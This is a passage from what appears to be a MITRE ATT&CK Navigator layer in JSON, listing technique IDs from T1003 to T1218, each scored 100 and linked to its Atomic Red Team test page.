ttps://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.007/T1003.007.md"},{"techniqueID":"T1003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.007/T1003.007.md"},{"techniqueID":"T1003.008","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.008/T1003.008.md"},{"techniqueID":"T1003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.008/T1003.008.md"},{"techniqueID":"T1003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003/T1003.md"},{"techniqueID":"T1006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1006/T1006.md"},{"techniqueID":"T1007","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1007/T1007.md"},{"techniqueID":"T1010","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1010/T1010.md"},{"techniqueID":"T1012","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1012/T1012.md"},{"techniqueID":"T1014","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1014/T1014.md"},{"techniqueID":"T1016","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1016/T1016.md"},{"techniqueID":"T1018","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1018/T1018.md"},{"techniqueID":"T1020","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1020/T1020.md"},{"techniqueID":"T1021.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.001
/T1021.001.md"},{"techniqueID":"T1021","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.001/T1021.001.md"},{"techniqueID":"T1021.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.002/T1021.002.md"},{"techniqueID":"T1021","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.002/T1021.002.md"},{"techniqueID":"T1021.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.003/T1021.003.md"},{"techniqueID":"T1021","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.003/T1021.003.md"},{"techniqueID":"T1021.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.006/T1021.006.md"},{"techniqueID":"T1021","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.006/T1021.006.md"},{"techniqueID":"T1027.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.001/T1027.001.md"},{"techniqueID":"T1027","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.001/T1027.001.md"},{"techniqueID":"T1027.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.002/T1027.002.md"},{"techniqueID":"T1027","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.002/T1027.002.md"},{"techniqueID":"T1027.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.004/T1027.004.md"},{"techniqueID":"T1027","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atom
ics/T1027.004/T1027.004.md"},{"techniqueID":"T1027","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027/T1027.md"},{"techniqueID":"T1030","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1030/T1030.md"},{"techniqueID":"T1033","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1033/T1033.md"},{"techniqueID":"T1036.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.003/T1036.003.md"},{"techniqueID":"T1036","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.003/T1036.003.md"},{"techniqueID":"T1036.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.004/T1036.004.md"},{"techniqueID":"T1036","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.004/T1036.004.md"},{"techniqueID":"T1036.005","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.005/T1036.005.md"},{"techniqueID":"T1036","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.005/T1036.005.md"},{"techniqueID":"T1036.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.006/T1036.006.md"},{"techniqueID":"T1036","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.006/T1036.006.md"},{"techniqueID":"T1036","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036/T1036.md"},{"techniqueID":"T1037.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.001/T1037.001
.md"},{"techniqueID":"T1037","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.001/T1037.001.md"},{"techniqueID":"T1037.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.002/T1037.002.md"},{"techniqueID":"T1037","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.002/T1037.002.md"},{"techniqueID":"T1037.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.004/T1037.004.md"},{"techniqueID":"T1037","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.004/T1037.004.md"},{"techniqueID":"T1037.005","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.005/T1037.005.md"},{"techniqueID":"T1037","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.005/T1037.005.md"},{"techniqueID":"T1040","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1040/T1040.md"},{"techniqueID":"T1046","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1046/T1046.md"},{"techniqueID":"T1047","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1047/T1047.md"},{"techniqueID":"T1048.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048.003/T1048.003.md"},{"techniqueID":"T1048","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048.003/T1048.003.md"},{"techniqueID":"T1048","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048/T1048.md"},{"techniqueID":"T1049
","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1049/T1049.md"},{"techniqueID":"T1053.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.001/T1053.001.md"},{"techniqueID":"T1053","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.001/T1053.001.md"},{"techniqueID":"T1053.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.002/T1053.002.md"},{"techniqueID":"T1053","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.002/T1053.002.md"},{"techniqueID":"T1053.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.003/T1053.003.md"},{"techniqueID":"T1053","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.003/T1053.003.md"},{"techniqueID":"T1053.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.004/T1053.004.md"},{"techniqueID":"T1053","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.004/T1053.004.md"},{"techniqueID":"T1053.005","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.005/T1053.005.md"},{"techniqueID":"T1053","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.005/T1053.005.md"},{"techniqueID":"T1053.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.006/T1053.006.md"},{"techniqueID":"T1053","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.006/T1053.006.md"},{"techniqueID":"
T1053.007","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.007/T1053.007.md"},{"techniqueID":"T1053","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.007/T1053.007.md"},{"techniqueID":"T1055.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.001/T1055.001.md"},{"techniqueID":"T1055","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.001/T1055.001.md"},{"techniqueID":"T1055.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.004/T1055.004.md"},{"techniqueID":"T1055","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.004/T1055.004.md"},{"techniqueID":"T1055.012","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.012/T1055.012.md"},{"techniqueID":"T1055","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.012/T1055.012.md"},{"techniqueID":"T1055","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055/T1055.md"},{"techniqueID":"T1056.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.001/T1056.001.md"},{"techniqueID":"T1056","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.001/T1056.001.md"},{"techniqueID":"T1056.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.002/T1056.002.md"},{"techniqueID":"T1056","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.002/T1056.002.md"},{"technique
ID":"T1056.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.004/T1056.004.md"},{"techniqueID":"T1056","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.004/T1056.004.md"},{"techniqueID":"T1057","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1057/T1057.md"},{"techniqueID":"T1059.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.001/T1059.001.md"},{"techniqueID":"T1059","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.001/T1059.001.md"},{"techniqueID":"T1059.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.002/T1059.002.md"},{"techniqueID":"T1059","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.002/T1059.002.md"},{"techniqueID":"T1059.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.003/T1059.003.md"},{"techniqueID":"T1059","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.003/T1059.003.md"},{"techniqueID":"T1059.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.004/T1059.004.md"},{"techniqueID":"T1059","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.004/T1059.004.md"},{"techniqueID":"T1059.005","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.005/T1059.005.md"},{"techniqueID":"T1059","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.005/T1059.005.md"},{"tech
niqueID":"T1059.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.006/T1059.006.md"},{"techniqueID":"T1059","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.006/T1059.006.md"},{"techniqueID":"T1069.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.001/T1069.001.md"},{"techniqueID":"T1069","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.001/T1069.001.md"},{"techniqueID":"T1069.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.002/T1069.002.md"},{"techniqueID":"T1069","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.002/T1069.002.md"},{"techniqueID":"T1070.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.001/T1070.001.md"},{"techniqueID":"T1070","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.001/T1070.001.md"},{"techniqueID":"T1070.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.002/T1070.002.md"},{"techniqueID":"T1070","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.002/T1070.002.md"},{"techniqueID":"T1070.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.003/T1070.003.md"},{"techniqueID":"T1070","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.003/T1070.003.md"},{"techniqueID":"T1070.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.004/T107
0.004.md"},{"techniqueID":"T1070","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.004/T1070.004.md"},{"techniqueID":"T1070.005","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.005/T1070.005.md"},{"techniqueID":"T1070","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.005/T1070.005.md"},{"techniqueID":"T1070.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.006/T1070.006.md"},{"techniqueID":"T1070","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.006/T1070.006.md"},{"techniqueID":"T1070","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070/T1070.md"},{"techniqueID":"T1071.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071.001/T1071.001.md"},{"techniqueID":"T1071","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071.001/T1071.001.md"},{"techniqueID":"T1071.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071.004/T1071.004.md"},{"techniqueID":"T1071","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071.004/T1071.004.md"},{"techniqueID":"T1072","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1072/T1072.md"},{"techniqueID":"T1074.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1074.001/T1074.001.md"},{"techniqueID":"T1074","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1074.001/T1074.001.m
d"},{"techniqueID":"T1078.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.001/T1078.001.md"},{"techniqueID":"T1078","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.001/T1078.001.md"},{"techniqueID":"T1078.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.003/T1078.003.md"},{"techniqueID":"T1078","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.003/T1078.003.md"},{"techniqueID":"T1082","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1082/T1082.md"},{"techniqueID":"T1083","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1083/T1083.md"},{"techniqueID":"T1087.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087.001/T1087.001.md"},{"techniqueID":"T1087","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087.001/T1087.001.md"},{"techniqueID":"T1087.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087.002/T1087.002.md"},{"techniqueID":"T1087","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087.002/T1087.002.md"},{"techniqueID":"T1090.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1090.001/T1090.001.md"},{"techniqueID":"T1090","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1090.001/T1090.001.md"},{"techniqueID":"T1095","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1095/T1095.md"},{"technique
ID":"T1098.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.001/T1098.001.md"},{"techniqueID":"T1098","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.001/T1098.001.md"},{"techniqueID":"T1098.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.004/T1098.004.md"},{"techniqueID":"T1098","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.004/T1098.004.md"},{"techniqueID":"T1098","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098/T1098.md"},{"techniqueID":"T1105","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1105/T1105.md"},{"techniqueID":"T1106","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1106/T1106.md"},{"techniqueID":"T1110.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.001/T1110.001.md"},{"techniqueID":"T1110","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.001/T1110.001.md"},{"techniqueID":"T1110.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.002/T1110.002.md"},{"techniqueID":"T1110","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.002/T1110.002.md"},{"techniqueID":"T1110.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.003/T1110.003.md"},{"techniqueID":"T1110","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.003/T1110.003.md"},{"techniqueID":"T1110.004"
,"score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.004/T1110.004.md"},{"techniqueID":"T1110","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.004/T1110.004.md"},{"techniqueID":"T1112","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1112/T1112.md"},{"techniqueID":"T1113","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1113/T1113.md"},{"techniqueID":"T1114.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1114.001/T1114.001.md"},{"techniqueID":"T1114","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1114.001/T1114.001.md"},{"techniqueID":"T1115","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1115/T1115.md"},{"techniqueID":"T1119","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1119/T1119.md"},{"techniqueID":"T1120","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1120/T1120.md"},{"techniqueID":"T1123","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1123/T1123.md"},{"techniqueID":"T1124","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1124/T1124.md"},{"techniqueID":"T1127.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1127.001/T1127.001.md"},{"techniqueID":"T1127","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1127.001/T1127.001.md"},{"techniqueID":"T1132.001","score":100,"enabled":true,"comment":"https://github.c
om/redcanaryco/atomic-red-team/blob/master/atomics/T1132.001/T1132.001.md"},{"techniqueID":"T1132","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1132.001/T1132.001.md"},{"techniqueID":"T1133","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1133/T1133.md"},{"techniqueID":"T1134.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.001/T1134.001.md"},{"techniqueID":"T1134","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.001/T1134.001.md"},{"techniqueID":"T1134.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.004/T1134.004.md"},{"techniqueID":"T1134","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.004/T1134.004.md"},{"techniqueID":"T1135","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1135/T1135.md"},{"techniqueID":"T1136.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.001/T1136.001.md"},{"techniqueID":"T1136","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.001/T1136.001.md"},{"techniqueID":"T1136.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.002/T1136.002.md"},{"techniqueID":"T1136","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.002/T1136.002.md"},{"techniqueID":"T1136.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.003/T1136.003.md"},{"techniqueID":"T1136","score":100,"enabled":true,"comment":"https://github.com/redc
anaryco/atomic-red-team/blob/master/atomics/T1136.003/T1136.003.md"},{"techniqueID":"T1137.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.002/T1137.002.md"},{"techniqueID":"T1137","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.002/T1137.002.md"},{"techniqueID":"T1137.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.004/T1137.004.md"},{"techniqueID":"T1137","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.004/T1137.004.md"},{"techniqueID":"T1137.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.006/T1137.006.md"},{"techniqueID":"T1137","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.006/T1137.006.md"},{"techniqueID":"T1137","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137/T1137.md"},{"techniqueID":"T1140","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1140/T1140.md"},{"techniqueID":"T1176","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1176/T1176.md"},{"techniqueID":"T1197","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1197/T1197.md"},{"techniqueID":"T1201","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1201/T1201.md"},{"techniqueID":"T1202","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1202/T1202.md"},{"techniqueID":"T1204.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics
/T1204.002/T1204.002.md"},{"techniqueID":"T1204","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1204.002/T1204.002.md"},{"techniqueID":"T1207","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1207/T1207.md"},{"techniqueID":"T1216.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1216.001/T1216.001.md"},{"techniqueID":"T1216","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1216.001/T1216.001.md"},{"techniqueID":"T1216","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1216/T1216.md"},{"techniqueID":"T1217","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1217/T1217.md"},{"techniqueID":"T1218.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.001/T1218.001.md"},{"techniqueID":"T1218","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.001/T1218.001.md"},{"techniqueID":"T1218.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.002/T1218.002.md"},{"techniqueID":"T1218","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.002/T1218.002.md"},{"techniqueID":"T1218.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.003/T1218.003.md"},{"techniqueID":"T1218","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.003/T1218.003.md"},{"techniqueID":"T1218.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.004/T121
8.004.md"},{"techniqueID":"T1218","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.004/T1218.004.md"},{"techniqueID":"T1218.005","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.005/T1218.005.md"},{"techniqueID":"T1218","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.005/T1218.005.md"},{"techniqueID":"T1218.007","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.007/T1218.007.md"},{"techniqueID":"T1218","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.007/T1218.007.md"},{"techniqueID":"T1218.008","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.008/T1218.008.md"},{"techniqueID":"T1218","score